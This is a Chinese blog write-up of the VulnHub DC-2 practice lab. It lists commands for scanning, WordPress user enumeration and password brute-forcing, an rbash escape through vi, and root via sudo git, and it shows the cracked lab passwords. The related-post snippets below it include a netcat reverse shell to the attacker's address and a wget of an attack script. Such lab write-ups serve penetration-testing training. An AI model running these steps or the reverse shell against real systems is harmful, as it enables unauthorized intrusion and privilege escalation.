DC-2 writeup

已于 2024-08-19 17:26:56 修改
阅读量442 收藏 12
点赞数 14
文章标签: 网络安全 web安全
于 2024-08-19 16:26:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64272648/article/details/141328465
版权

DC-2渗透过程(kali IP:192.168.229.132 靶机IP:192.168.229.150)

一.信息收集

-用nmap扫描靶机
nmap -sP 192.168.229.0/24 //靶机IP:192.168.229.150
-扫开放端口
nmap -sV -p- 192.168.229.150 //开放端口:http 80 ssh 7744
-收集web信息
whatweb 192.168.229.150
-扫描web目录 dirsearch -u 192.168.229.150 -e * -x 404,405
得到信息:cms: wordpress 4.7.10 中间件:apache 2.4.10 语言:php 后台登录页面 /wp-login.php

二.漏洞查找
searchsploit wordpress 4.7.10 //发现有任意文件删除,查看用户信息,Dos攻击等漏洞,这里感觉只有查看用户信息有用,查看他的利用信息

三.漏洞利用

locate multiple/webapps/47690.md
cat /usr/share/exploitdb/exploits/multiple/webapps/47690.md //发现给了一个有漏洞的url,http://wordpress.local/?static=1&order=asc,访问发现flag1,flag2,flag1提示我们要用cewl爬网站,flag2提示我们wordpress行不通,要用其他方法

四.密码爆破

wpscan -url "http://192.168.229.150/?static=1&order=asc" -e u //用wpscan爆破出用户名,不能访问http://dc-2/用上面发现的有漏洞的url代替,扫出admin jerry tom
cewl "http://192.168.229.150/?static=1&order=asc" -w test //用cewl爬网站,爬出一个密码字典 wpscan --url "http://192.168.229.150/?static=1&order=asc" -U name -P test //用cewl爬出的字典爆破密码 爆破出来两个 tom:parturient jerry:adipiscing

五.ssh远程连接获取rbash

ssh jerry@192.168.229.150 -p 7744
ssh tom @192.168.229.150 -p 7744 //密码爆破出来登录进去发现看到的和之前的一样,则尝试ssh远程连接,jerry的一直连接不上,尝试连tom,能连上

六.提权

-rbash逃逸 ls //发现有flag4但用cat查看不了,报rbash,说明现在权限很低只能执行一些指令
echo $PATH
echo /home/tom/usr/bin/* //查看上面得到的path路径的所有文件,发现可用,用less,ls,scp,vi
less falag3.txt //提示我们要用su,但现在的权限是rbash不能用su
vi test
:set shell=/bin/bash
:shell
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/ //这里用vi逃逸rbash su jerry //根据提示去jerry的家目录找找
cd ~ ls
cat flag4.txt //找到flag4,提示用git提权
-git提权
sudo -l //看看哪些指令以root执行,果然有git
sudo git -p help
!/bin/bash //获得root权限
find / -name * flag *
cd /root
ls
cat final-flag.txt

Jay-wings
关注
vulnhub靶机-DC1-Writeup
liuhanzhe的专栏
12-08 1182
vulnhub靶机-DC1-writeup
VulnHub DC-2 Writeup
末初的CSDN博客
09-28 403
DC-2详情见:https://www.vulnhub.com/entry/dc-2,311/ 靶机环境VIrtualBox,连接VirtualBox Host-Only网卡,IP为:192.168.56.103 攻击机环境VMware,桥接模式,桥接至VIrtualBox Host-Only网卡,IP为:192.168.56.177 扫描C段内存活主机 arp-scan -l or nmap -sP 192.168.56.1/24 访问http://192.168.56.103发现被重定向到了
VulnHub DC-1 Writeup
末初的CSDN博客
09-28 431
DC-1详情见:https://www.vulnhub.com/entry/dc-1,292/ 靶机环境VirtualBox,连接VirtualBox Host-Only网卡,IP为:192.168.56.102 攻击机环境VMware,桥接模式,桥接至VirtualBox Host-Only网卡,IP为:192.168.56.177 Nmap扫描C段内存活主机 nmap -sP 192.168.56.1/24 如果觉得速度慢了的话可以使用 arp-scan -l 发现目标靶机IP:192.1
Vulnhub靶机DC-2 writeup
xingjinhao123的博客
08-03 612
​。
DC-5 writeup
qq_64272648的博客
08-19 439
用burpsuite爆破文件包含名/thankyou.php?file=/etc/nginx/nginx.conf //先看一下nginx的配置文件看日志文件开放没有,可能会有日志文件包含,发现有两个日志文件,这里可以看错误日志文件/var/log/nginx/error.log /thankyou.php?file=/var/log/nginx/error.log&1=nc -e /bin/bash 192.168.229.132 8888 //在kali上开启监听,连接虚拟shell。
DC-1 writeup
qq_64272648的博客
08-19 647
/得到两个用户,admin,Fred,密码加密可以尝试修改密码(新添一个用户,密码记住,然后把加密后的密码拷到admin的密码里),这里查看资料知道加密脚本是用php写的并且还能用php加参数运行,直接得到加密后的密码 cat /var/www/scripts/password-hash.sh php /var/www/scripts/password-hash.sh 123456 //得到加密后的密码 mysql -udbuser -pR0ck3t use drupaldb;
DC-9 writeup
qq_64272648的博客
08-19 346
file=../../../../../etc/knockd.conf //前面扫端口发现ssh协议端口不是开放状态,可能是开启了knock服务查看一下有无配置文件,还真有用nc“敲门”§ §=../../../../../etc/passwd //burp抓包,用fuzz里的参数字典爆破出为file,还发现这里的用户和开始sq爆破出来的一样,可能是主机用户的账号密码。sudo -l //发现/opt/devstuff/dist/test/test可用以root命令执行。
DC-7 writeup
qq_64272648的博客
08-19 140
drush upwd admin --password="123456" //修改admin的密码,登录进去看看,发现content板块可以写入html文件,但不能写入php文件,收集信息发现可以新增php模块,把这个url写到那个添加链接中https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz。ls -l //发现www-data有写入和执行权限但dcuser没有,则我们要尝试找到www-data的权限。**一.信息收集**
DC-3 writeup
qq_64272648的博客
08-19 378
登录进入后台,发现有文件上传点,上传反弹shell文件(文件见主机渗透文件夹),再用netcat 开启监听,再访问上传的shell的网站路径(配合前面的web目录扫描及网站上面的信息推断出上传的位置),得到一个虚拟shell。cat /usr/share/exploitdb/exploits/linux/local/39772.txt //查看文件,最后给出了exp下载地址。locate /linux/local/39772.txt //查看完整路径。**四.Linux提权**
DC-4 writeup
qq_64272648的博客
08-19 323
wget http://192.168.229.132:/8000/test.sh //发现没有写入权限,则cd到 /tmp 文件中,在/tmp目录下任何人都有写权限。cd /home //去家目录下寻找线索发现只有jim能查看里面的信息,mbox还看不了,里面有一个旧密码的备份文件,复制到test文件尝试爆破。find / -perm -u=s -type f 2>/dev/null //查看哪些有suid权限发现没有可用的。./test.sh //得到root权限。
vulnhub靶机-DC2-Writeup
liuhanzhe的专栏
12-08 646
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-2,311/ DESCRIPTION Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. As with the original DC-1, it’s designed with begi
vulnhub靶机-DC7-Writeup
liuhanzhe的专栏
12-09 1590
0x01 介绍 靶机地址: https://www.vulnhub.com/entry/dc-7,356/ DESCRIPTION DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. While this isn’t an overly technical challenge, it isn’t exactly e
vulnhub靶机-DC6-Writeup
liuhanzhe的专栏
12-08 358
0x01 介绍 靶机地址: https://www.vulnhub.com/entry/dc-6,315/ DESCRIPTION DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This isn’t an overly difficult challenge so should be great for be
ichunqiu云境 - Delegation Writeup
WUfagg的博客
12-10 926
一场内网渗透
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8508
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网数中心举办CISAW安全软件教师培训 助力国家网络安全战略
qq_44969472的博客
10-15 386
他强调,CISAW安全软件人员认证应立足我国软件安全开发的特色,以服务国家网络安全战略布局为核心,通过认证结果不断带动人员能力提升,聚焦行业需求、热点和难点问题,进一步完善创新发展体系。我们相信,随着CISAW认证体系的不断完善和发展,必将为我国信息安全领域输送更多优秀的人才,助力国家信息安全事业迈上新的台阶。这一环节得到了大家的一致好评,许多教师表示,通过实际操作,他们不仅巩固了所学知识,还获得了更多的实战经验。他表示,通过这次培训,大家不仅学到了最新的技术和理念,更重要的是,明确了未来努力的方向。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
10-15 1215
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
2024年网络安全进阶手册:三个月黑客技术自学路线
2401_85027336的博客
10-12 1205
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
2024年网络安全(黑客技术)三个月自学手册
最新发布
csbDD的博客
10-18 507
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值